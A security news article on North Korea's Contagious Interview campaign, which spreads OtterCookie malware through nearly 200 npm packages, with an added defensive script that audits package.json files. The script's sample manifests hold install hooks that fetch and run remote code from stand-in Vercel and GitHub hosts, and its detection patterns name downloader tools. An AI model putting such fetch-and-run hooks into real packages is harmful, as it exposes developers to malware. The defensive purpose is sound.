Software supply-chain security firm Socket has issued an alert that North Korean threat actors have sharply escalated their ongoing Contagious Interview campaign, publishing nearly 200 new malicious packages to the npm registry, the repository where JavaScript developers share and download code, since October 10, 2025. The attack targets blockchain and Web3 developers through fake job interviews and “test assignments,” Socket’s investigation found.
Socket further found that these new packages had already been downloaded more than 31,000 times and are designed to quietly install the OtterCookie malware.
This campaign follows earlier Contagious Interview activity covered by Hackread.com, including a 2024 report on the campaign (also tracked as Eager Crypto Beavers) in which the Lazarus Group used fake job offers and malicious video-conferencing apps (such as FCCCall) to distribute the BeaverTail malware.
In April 2025, Silent Push also linked this campaign to the Lazarus Group, detailing its use of AI-generated employee images and fake front companies (such as BlockNovas LLC) to lure job seekers. Cisco Talos later found evidence that BeaverTail’s functionality had been merged into OtterCookie. Socket’s discovery confirms the attackers are continuing the campaign with the same malware family.
According to Socket’s blog post, the attackers use a multi-stage delivery chain. First, they publish packages with innocuous-sounding utility names (such as tailwind-magic, node-tailwind, and react-modal-select) to the npm registry. When a victim installs one of these packages, it silently contacts a staging endpoint hosted on Vercel (tracked as tetrismicvercelapp) to retrieve the next stage.
That Vercel stager in turn fetches the final payload from a GitHub account (tracked as stardev0914, which held 18 repositories and has since been removed). A separate command-and-control server (tracked at the IP address 144.172.104.117) receives the data collected once a machine is compromised.
The attackers also use fake projects, including a cloned crypto-themed website, as lures so that the malicious packages appear to be part of legitimate work.
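The delivery chain above (install hook on npm, stager on Vercel, payload on GitHub) is something a developer handed a “take-home test” can check for before running `npm install`. The following is an added example written for this article, not code from Socket’s report or from Hackread: it audits a set of package.json manifests for the package names Socket attributed to the campaign and for install-time lifecycle scripts that fetch or execute remote code. The package names come from the article; the generic downloader, inline-eval and URL heuristics, the sample manifests, and the stager hostname in them are constructed for this example and are not indicators Socket published.

```javascript
// Added example (not Socket's or Hackread's code): audit package.json
// manifests, e.g. every node_modules/*/package.json in an assignment repo,
// for the delivery pattern described in the report.

// Package names Socket attributed to the campaign, as cited in the article.
const KNOWN_MALICIOUS_PACKAGES = new Set([
  "tailwind-magic",
  "node-tailwind",
  "react-modal-select",
]);

// Lifecycle hooks npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators that a hook reaches out for a second stage. The Vercel and
// raw-GitHub hosts mirror the staging tiers in the report; the downloader,
// inline-eval and generic URL checks are broader heuristics added here
// (an assumption of this example, not indicators Socket published).
const REMOTE_FETCH_PATTERNS = [
  { id: "vercel-stager", re: /\.vercel\.app\b/i },
  { id: "raw-github", re: /raw\.githubusercontent\.com/i },
  { id: "downloader", re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
  { id: "inline-eval", re: /\bnode\s+-e\b|\beval\(|new Function\(/i },
  { id: "remote-url", re: /https?:\/\//i },
];

// Audit one manifest; returns a (possibly empty) list of findings.
function auditManifest(manifest) {
  const findings = [];
  const name = manifest.name || "<unnamed>";

  if (KNOWN_MALICIOUS_PACKAGES.has(name)) {
    findings.push({
      package: name,
      severity: "high",
      reason: "package name listed in Socket's Contagious Interview report",
    });
  }

  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const indicators = REMOTE_FETCH_PATTERNS
      .filter((p) => p.re.test(command))
      .map((p) => p.id);
    if (indicators.length > 0) {
      findings.push({
        package: name,
        severity: "high",
        hook,
        indicators,
        reason: `install hook "${hook}" fetches or executes remote code`,
        command,
      });
    }
  }
  return findings;
}

// Audit a whole dependency tree (array of parsed package.json objects).
function auditAll(manifests) {
  return manifests.flatMap((m) => auditManifest(m));
}

// Sorted, de-duplicated names of packages with at least one finding.
function flaggedPackages(manifests) {
  return [...new Set(auditAll(manifests).map((f) => f.package))].sort();
}

// Constructed sample manifests; commands and hosts are invented stand-ins,
// not the real package contents or the real stager URL.
const SAMPLE_MANIFESTS = [
  { name: "lodash", version: "4.17.21", scripts: { test: "mocha" } },
  {
    name: "tailwind-magic",
    version: "1.0.3",
    scripts: {
      postinstall:
        "node -e \"require('https').get('https://example-stager.vercel.app/loader.js', r => r.pipe(process.stdout))\"",
    },
  },
  // A native add-on's install hook is noisy but local: no remote fetch.
  { name: "native-addon", version: "2.0.0", scripts: { install: "node-gyp rebuild" } },
  {
    name: "ci-helper",
    version: "0.1.0",
    scripts: {
      preinstall:
        "curl -fsSL https://raw.githubusercontent.com/example-user/example-repo/main/setup.sh | sh",
    },
  },
];

for (const f of auditAll(SAMPLE_MANIFESTS)) {
  const detail = f.indicators ? ` (${f.indicators.join(", ")})` : "";
  console.log(`[${f.severity}] ${f.package}: ${f.reason}${detail}`);
}
```

Run against the constructed sample, the audit flags `tailwind-magic` twice (known name plus a postinstall hook contacting a `.vercel.app` host) and `ci-helper` once (a preinstall hook piping raw GitHub content into `sh`), while `lodash` and the native add-on pass. A name denylist alone goes stale as fast as the attackers publish new packages, so the hook check is the part worth keeping; in practice, pair it with `npm config set ignore-scripts true` and install unfamiliar assignment repositories only in a disposable VM or container.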
OtterCookie (a variant of BeaverTail) is built to steal large amounts of data. After infecting the victim’s computer, it first runs anti-analysis checks to detect whether it is being run in a sandbox or under a researcher’s tools and, if nothing is detected, connects back to the attackers’ server.
That connection gives the attackers what the report calls a “remote shell,” effectively letting them control the infected machine remotely. The malware then begins its collection routine: continuously harvesting anything copied to the clipboard, keylogging, capturing screenshots, and scanning for valuable documents. It also hunts for browser credentials and cryptocurrency wallet data on Windows, macOS, and Linux systems.
“This sustained tempo makes Contagious Interview one of the most prolific campaigns exploiting npm,” Socket’s Threat Research Team concluded.
Security experts who reviewed Socket’s research shared their comments exclusively with Hackread.com, emphasising how organised and persistent this North Korean operation is.
Collin Hogue-Spears, Senior Director of Solution Management at Black Duck, noted that the campaign is highly structured and professional. He stated, “Contagious Interview is an industrialised software supply chain campaign, not a one-off backdoor.”
He highlighted how the hackers use GitHub for source control, Vercel for payload staging, npm for distribution, and a separate C2 tier for exfiltration, showing the modular nature of the attack. Hogue-Spears warned that a malicious ‘take-home test’ can give attackers “the access that an insider would have, without ever appearing on your payroll.”
Randolph Barr, Chief Information Security Officer at Cequence Security, echoed this sentiment, pointing out that the attackers are imitating legitimate development teams. He observed, “It seems just like a simplified software development lifecycle, but for malware instead of product features.” He stressed that these attackers “can send out malicious updates on a large scale with relatively little trouble” by using open developer systems.
Jason Soroko, Senior Fellow at Sectigo, supported this comparison, saying the term “simplified software development lifecycle for malware is accurate in spirit.” He noted that the operators prioritise patterns that “maximise agility and survivability,” such as separating delivery from the payload and rapidly cloning the same core malware into many lures.